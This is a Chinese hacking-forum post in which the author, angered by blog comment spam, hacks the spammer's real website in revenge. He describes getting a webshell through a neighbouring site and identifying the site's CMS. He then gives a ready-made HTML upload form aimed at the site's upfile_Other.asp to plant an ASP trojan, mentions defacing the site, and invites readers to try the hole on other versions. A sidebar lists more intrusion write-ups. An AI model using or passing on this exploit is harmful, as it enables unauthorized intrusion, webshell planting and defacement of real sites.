|
[推荐]黑一广告站时发现的漏洞
一大早的来到公司打开自己的BLOG..却发现BLOG评论里N多垃圾广告...
具体内容是什么
内江云吉滤烟技术研究所
然后还发出了网站地址
http://www.2266556.com/
当时看到了气不打一处来...好不容易算是制止住了一些广告..这个SB又发了那么多
害我删了半天..不教训教训他这口气怎么咽的下..
首先旁注拿到一webshell发现没权限..直接从这个站入手..发现他程序的版权给改掉了..看了N多页面后..在一个登陆页面看了源代码时发现一个隐藏的"紫荆科技"
去baidu搜索后才知道这个程序是
紫荆科技企业网站管理系统
然后就下载了一个
紫荆科技企业网站管理系统V9.0(无功能限制完美版)
来看他的代码试图找到突破点
经过不断的测试发现
http://www.2266556.com/upfile_Other.asp
可以上传任意文件
使用以下的代码就可以成功上传asp木马...
| 以下是引用片段: <FORM name=form1 action="http://www.2266556.com/upfile_Othe ... sp;method=post encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> <INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML> |
SB站的黑页截图
目标站用的程序版本不知道是多少..别的版本我也未测试
有兴趣的可以测试是否也存在此漏洞
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
您现在的位置: